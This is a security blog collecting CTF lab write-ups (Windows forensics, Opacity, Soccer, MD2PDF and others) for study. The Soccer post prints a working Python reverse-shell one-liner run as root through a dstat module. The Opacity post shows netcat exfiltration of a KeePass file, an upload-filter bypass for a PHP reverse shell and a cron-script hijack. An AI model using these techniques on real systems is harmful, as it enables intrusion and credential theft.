SDSec12

Wednesday, May 17, 2023

THM - Windows Forensics 1

Scenario

One of the Desktops in the research lab at Organization X is suspected to have been accessed by someone unauthorized. Although they generally have only one user account per Desktop, there were multiple user accounts observed on this system. It is also suspected that the system was connected to some network drive, and a USB device was connected to the system. The triage data from the system was collected and placed on the attached VM. Can you help Organization X with finding answers to the below questions?

Questions

How many user created accounts are present on the system?
Load the SAM hive found in triage\C\Windows\System32\Config within here we can find the users. The question only wants user created accounts. Disregarding the builtin account we have 3

What is the username of the account that has never been logged in?
We can answer this within the same hive, there is only one user without a Last Login Time

What's the password hint for the user THM-4n6?
Can also be answered from within here :)

When was the file 'Changelog.txt' accessed?
Load the NTUSER hive, drill down to RecentDocs and check .txt files.

What is the complete path from where the python 3.8.2 installer was run?
Within the User hive, drill down to the User Assist registry keys and look for the GUID with the most key values. Within here you can find all the applications which have executed.

When was the USB device with the friendly name 'USB' last connected?
The question is to find the USB device with the friendly name ‘USB’, let's look in SOFTWARE\Microsoft\Windows Portable Devices\Devices

Further USB information can be found with the SYSTEM hive under:
SYSTEM\CurrentControlSet\Enum\USBSTOR
SYSTEM\CurrentControlSet\Enum\USB

Look at the device with the GUID matching the friendly named USB device.

Tuesday, April 25, 2023

THM - Opacity

Enumeration

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-25 11:11 BST

Nmap scan report for 10.10.87.188

Host is up (0.022s latency).

Not shown: 65531 closed tcp ports (conn-refused)

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0fee2910d98e8c53e64de3670c6ebee3 (RSA)
| 256 9542cdfc712799392d0049ad1be4cf0e (ECDSA)
|_ 256 edfe9c94ca9c086ff25ca6cf4d3c8e5b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-25T10:11:28
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 26.62 seconds

Port 80 open with Apache 2.4.41 running
SMB running

More enumeration!

└─$ smbclient -L \\\\10.10.87.188
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (opacity server (Samba, Ubuntu))

not much without authentication for SMB

└─$ smbmap -H 10.10.87.188
[+] IP: 10.10.87.188:445 Name: 10.10.87.188
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (opacity server (Samba, Ubuntu))
START_TIME: Tue Apr 25 11:30:03 2023

URL_BASE: http://10.10.87.188/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://10.10.87.188/ ----
==> DIRECTORY: http://10.10.87.188/cloud/

The cloud directory looks interesting!

We can try to upload things!

Exploitation

Whilst dirb was running in the background it also found http://10.10.87.188/cloud/images/ , at an assumption this is where the uploaded images are stored.

I hosted a server and tried to upload a shell using https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php . It didn't like this as it had to be an image.

I tried with just a space and then the .jpg, didn't work, using a null character #.jpg worked and we had a shell.. for a time. The 5 minutes file upload meant you only have 5 minutes until the files are deleted.

$ ls
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swap.img
sys
tmp
usr
var
$ whoami
www-data
$ cd home
$ ls
sysadmin
$ cd sysadmin
$ ls
local.txt
scripts
$ cat local.txt
cat: local.txt: Permission denied

We have a second user, sysadmin, we want this one!

www-data doesn't have much access, there is a scripts folder but we don't have permissions for that, but we do have access to opt and there is an interesting file in there called dataset.kdbx. A kdbx file is a keepass database, we want this!

After some hunting I found we can transfer files using netcat (nc). To do this, on the destination host (our attack box) we want to listen for the file

Example: nc -l -p 7555 > myfile.txt
Used: nc -lnvp 4446 > dataset.kdbx

On the source host (victim) we send the file:
Example: nc 10.1.1.2 7555 < myfile.txt
Used: nc 10.9.3.226 4446 < dataset.kdbx

We now have the file! Let's crack it.

Following the guide from https://www.thedutchhacker.com/how-to-crack-a-keepass-database-file/ we can pull out the hash using keepass2john and then crack the password.

keepass2john dataset.kdbx > hash.txt

Take the cracked password, open the database, get the new creds.

Remember, SSH is open, let's go get our first flag!

PrivEsc

Now we're on the machine without a time limit we can take a breath and think of the next step. Under the sysadmin there is a script.php which is the script used to delete the files found within the images folder.. this does run every 5 minutes and could be useful. There are a bunch of php files under the lib directory.

sysadmin@opacity:~/scripts$ ls -lha
total 16K
drwxr-xr-x 3 root root 4.0K Jul 8 2022 .
drwxr-xr-x 6 sysadmin sysadmin 4.0K Feb 22 08:16 ..
drwxr-xr-x 2 sysadmin root 4.0K Jul 26 2022 lib
-rw-r----- 1 root sysadmin 519 Jul 8 2022 script.php

Hello... the script is owned by root... but we can't edit :(

After a little, okay a lot, of thinking, we know root is running the script, we know there is a job to run the script.php from the scripts folder. What if we just make a new script which is a reverse shell? Let's give it ago, using the same script as before we can load that into a new scripts folder (moving/renaming the old one) call it script.php, set up the listener and wait....

Boom, it worked! From here we can get the final flag!

Really fun machine this one, luckily my brain has a small capacity and I totally forgot about SMB which wasn't required. The folder being cleared out stumped me for a while until the penny dropped and getting root being as simple as it was tripped me!

Monday, April 24, 2023

THM - Investigating Windows

Introduction

This is a challenge that is exactly what is says on the tin, there are a few challenges around investigating a windows machine that has been previously compromised.

Questions

Whats the version and year of the windows machine?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Which user logged in last?
Get-LocalUser | Select Name, Lastlogon

When did John log onto the system last?
We can get that info from our last command

What IP does the system connect to when it first starts?
There will be a cmd pop up upon system login with the IP

What two accounts had administrative privileges (other than the Administrator user)?
net localgroup administrators

Whats the name of the scheduled task that is malicious.
Check the scheduled tasks, there will be a few obvious ones which stick out! Check the actions of each.

What file was the task trying to run daily?
Found under the actions of the malicious task.

What port did this file listen locally for?
Found under the actions of the malicious task.

When did Jenny last logon?
We can use Get-LocalUser | Select Name, Lastlogon
Or
Check the Security Log in EventViewer and filter for Jenny and EID 4624

At what date did the compromise take place?
Something was created for persistence, when?

At what time did Windows first assign special privileges to a new logon?
Search EID 4672 under the security log.

What tool was used to get Windows passwords?
We can find that within the TMP folder the attackers created.

What was the attackers external control and command servers IP?
Check the hosts file for any potential changes made by the attacker

What was the extension name of the shell uploaded via the servers website?
Check wwwroot

What was the last port the attacker opened?
Check the firewall rules for inbound, there are a few suspicious ports being opened to allow inbound connectivity.

Check for DNS poisoning, what site was targeted?
We found this within the hosts file.

Wednesday, April 5, 2023

HTB - Illumination

Initial Investigation & Solution

We can actually find the problem upon unzipping the challenge.

We see immediately that there is a .git folder along with what looks to be the log file!

Using git to read the log.

A token was removed as a security precaution, dig a little deeper and view the change.

There is the token! Looks to be base64 so simply decode and we have our flag!

Friday, March 17, 2023

HTB - Behind The Scenes

Initial Investigation

Upon running the application it asks us for ./challenge <password>

Let's run strings and see what we find:

The interesting parts are we can see it is expected the password to be in the format HTB{something}

Reversing

We can throw the binary into Ghidra and see what else we find. Within the main it looks to stop.

There is a UD2 instruction and then disassembly stops.

After some research I found this within the Ghidra github . User pjsoberoi's comment is the solution:

"IMHO that is the correct behavior. You can manually disassemble the bytes after but that shouldn't change the decompilation. You can edit your own x86 slaspec and replace ud2 instruction with a "nop" pcode instruction. This should basically make the decompiler ignore the ud2 instruction. That seems like what you want."

With this information I disassembled the rest.

We then run through and replace all the UD2 instructions with a NOP and slowly the code is built out until we eventually get our password and flag!

Friday, March 3, 2023

HTB - Soccer

Enumeration

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-01 15:36 GMT
Nmap scan report for 10.10.11.194
Host is up (0.11s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
22/tcp   open ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open http            nginx 1.18.0 (Ubuntu)
9091/tcp open xmltec-xmlmail?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9091-TCP:V=7.93%I=7%D=3/1%Time=63FF711E%P=x86_64-pc-linux-gnu%r(inf
SF:ormix,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\
SF:n\r\n")%r(drda,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x2
SF:0close\r\n\r\n")%r(GetRequest,168,"HTTP/1\.1\x20404\x20Not\x20Found\r\n
SF:Content-Security-Policy:\x20default-src\x20'none'\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nCon
SF:tent-Length:\x20139\r\nDate:\x20Wed,\x2001\x20Mar\x202023\x2015:37:09\x
SF:20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=
SF:\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error</title>\n</h
SF:ead>\n<body>\n<pre>Cannot\x20GET\x20/</pre>\n</body>\n</html>\n")%r(HTT
SF:POptions,16C,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Poli
SF:cy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r
SF:\nDate:\x20Wed,\x2001\x20Mar\x202023\x2015:37:09\x20GMT\r\nConnection:\
SF:x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<met
SF:a\x20charset=\"utf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>Ca
SF:nnot\x20OPTIONS\x20/</pre>\n</body>\n</html>\n")%r(RTSPRequest,16C,"HTT
SF:P/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-sr
SF:c\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20t
SF:ext/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Wed,\x
SF:2001\x20Mar\x202023\x2015:37:09\x20GMT\r\nConnection:\x20close\r\n\r\n<
SF:!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<meta\x20charset=\"ut
SF:f-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>Cannot\x20OPTIONS\x
SF:20/</pre>\n</body>\n</html>\n")%r(RPCCheck,2F,"HTTP/1\.1\x20400\x20Bad\
SF:x20Request\r\nConnection:\x20close\r\n\r\n")%r(DNSVersionBindReqTCP,2F,
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r
SF:(DNSStatusRequestTCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnecti
SF:on:\x20close\r\n\r\n")%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\
SF:nConnection:\x20close\r\n\r\n")%r(SSLSessionReq,2F,"HTTP/1\.1\x20400\x2
SF:0Bad\x20Request\r\nConnection:\x20close\r\n\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.65 seconds

We find port 22, 80 and 9091 open. Let's do some further enumeration on port 80.

80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)

We find the domain, let's add it to our hosts file and continue our investigation.

There isn't a lot on the domain, seems to just be a static site with some football information. Let's use gobuster to see if we can find something interesting.

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://soccer.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/03/01 16:07:48 Starting gobuster in directory enumeration mode
===============================================================
/tiny                 (Status: 301) [Size: 178] [--> http://soccer.htb/tiny/]

We have a directory called "tiny". We find that this is a file manager with a login. A quick search reveals some default credentials:

https://tinyfilemanager.github.io/docs/
Default creds:
admin/admin@123
user/12345

Luckily, the admin creds work and we're in!

Initial Foothold

Not in my screenshot is the Tiny FM version which is 2.4.3. Back to the research table we find that 2.4.3 has a vulnerability!

"A Path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager Project's Tiny File Manager <= 2.4.6 allows remote attackers with valid user accounts to upload malicious PHP files to the webroot and achieve code execution on the target server."

https://github.com/febinrev/tinyfilemanager-2.4.3-exploit

Unfortunately the POC doesn't work in this instance but it does reveal that the exploit exists.

┌──(kali㉿kali)-[~]
└─$ ./exploit.sh http://soccer.htb/tiny/tinyfilemanager.php admin "admin@123"
/usr/bin/curl
[✔] Curl found!
/usr/bin/jq
[✔] jq found!

[+] Login Success! Cookie: filemanager=n8tbi19hj6jbq1lr9c0cj8a33k

[*] Try to Leak Web root directory path

[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : /var/www/html/tiny/

[-] File Upload Unsuccessful! Exiting!

The problem was with the upload, and we don't have the correct permissions to upload to the location the script attempts. We're going to go manual!

First let's find a location we can upload to and prove that it works.

We can upload to the uploads folder (of course..) and the test worked so now let's upload a shell. I recently pulled the blackarch shell repo so I used the php reverse shell within that. Changing the IP and port to match. Set up the listener and then fire.

We have a shell as www-data! We can make this a little more pleasant using

python3 -c "import pty; pty.spawn('/bin/bash')"

I must admit, I was stuck now as the account didn't have much access. Being still new to this I had to do a lot of research into nginx and I found out there is a folder which contains a config file. Within this conf file is mention of the sites-enabled location so I pivot to look in there. We find a new site called soc-player.soccer.htb, add it to our hosts file and let's go take a look.

There was a little more to this site, including a login page! If we go to the login page we will find that we have no creds but we can sign up. Create a new dummy account and login. We now have a ticket and a page where we can insert a ticket number. Open the developer tools and investigate how the site works and what is happening.

When a ticket number is put into the box and we click check then communication happens over a websocker to soc-player.soccer.htb:9091, this was our mystery port we found during enumeration, the next step is to exploit this process.

Exploitation - User

Let's view the page source code

From this code we can see now exactly how it works. But how to exploit? After another big session of researching I found https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html which goes into detail on how to conduct SQL injection over a websocket. I grabbed the script and made the required edits and set up the proxy.

We can then send sqlmap through the proxy to do it's work. Note that sqlmap through this proxy will take a very long time! I recommend making sure it is running and then leaving it for 10-15 minutes and do something else.

sqlmap -u "http://127.0.0.1:8081/?id=1" --batch --dbs - this was used first to get some enumeration on the database.

sqlmap -u "http://127.0.0.1:8081/?id=1" --dbms mysql --dbs --threads 10 -p id -D soccer_db -T accounts -C username,password -dump-all - this was then the dump.

We can now log in through SSH and get the user flag!

Exploitation - Root

We now have user! Let's check if we can run anything as root. Damn!

Back to searching for an answer I came across a few different things, first was the alternative to sudo, doas. I then found two enumeration scripts LinEnum and LinPEASS.

I pulled down both scripts and uploaded them to soccer. Of the two I found LinPEASS to be a lot better and the latest release can be found here: https://github.com/carlospolop/PEASS-ng/releases/tag/20230226, and here is LinEnum: https://github.com/rebootuser/LinEnum.

After running LinPEASS we find that doas is on the system and we can use it to run dstat as root.

Dstat is a linux performance measuring tool but you can write custom modules for it. More research... https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-dstat-privilege-escalation/ has a nice overview. Unfortunately the exploit within here didn't work but we can try something else!

Using https://www.revshells.com/ to create a reverse shell in python we can use dstat to run it as a custom module.

Dstat will load modules from /usr/local/share/dstat/ , create a new module called dstat_<whatever>.py with the payload

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

Run it with doas -u root /usr/bin/dstat --<module name>

Be sure to have your listener running and you will get a root shell! From here you can get the root flag!

This was a long one but really fun!

Tuesday, February 21, 2023

THM - MD2PDF

Enumeration

We start with running nmap on the target to see what is running.

nmap -sC -sV -T 4 <target ip>

We have port 22 open, port 80 and port 5000. We will go straight to port 80 and further our enumeration.

The server is hosting a Markdown to PDF converter. Let's convert something and see what is being used on the back end.

It is using wkhtmltopdf 0.12.5 to convert the MD. Researching exploits and vulnerabilities for this version brings us to file inclusion!

Let's find out what directories are on the server using gobuster.

└─$ gobuster dir --url http://10.10.96.67/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.96.67/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/02/20 17:10:11 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 403) [Size: 166]
/convert              (Status: 405) [Size: 178]
Progress: 87615 / 87665 (99.94%)
===============================================================
2023/02/20 17:18:37 Finished
===============================================================

Interesting, there is an admin and convert page.

Exploitation

We want to try and have this admin page included within the conversion. Let's first test and see if there is input sanitization happening.

We seem to be able to use html tags fine, let's try using an iframe and include the admin page. Unfortunately I forgot to screenshot the result of this but it didn't work! Remembering we had port 5000 open we adjust slightly.

And we have the flag!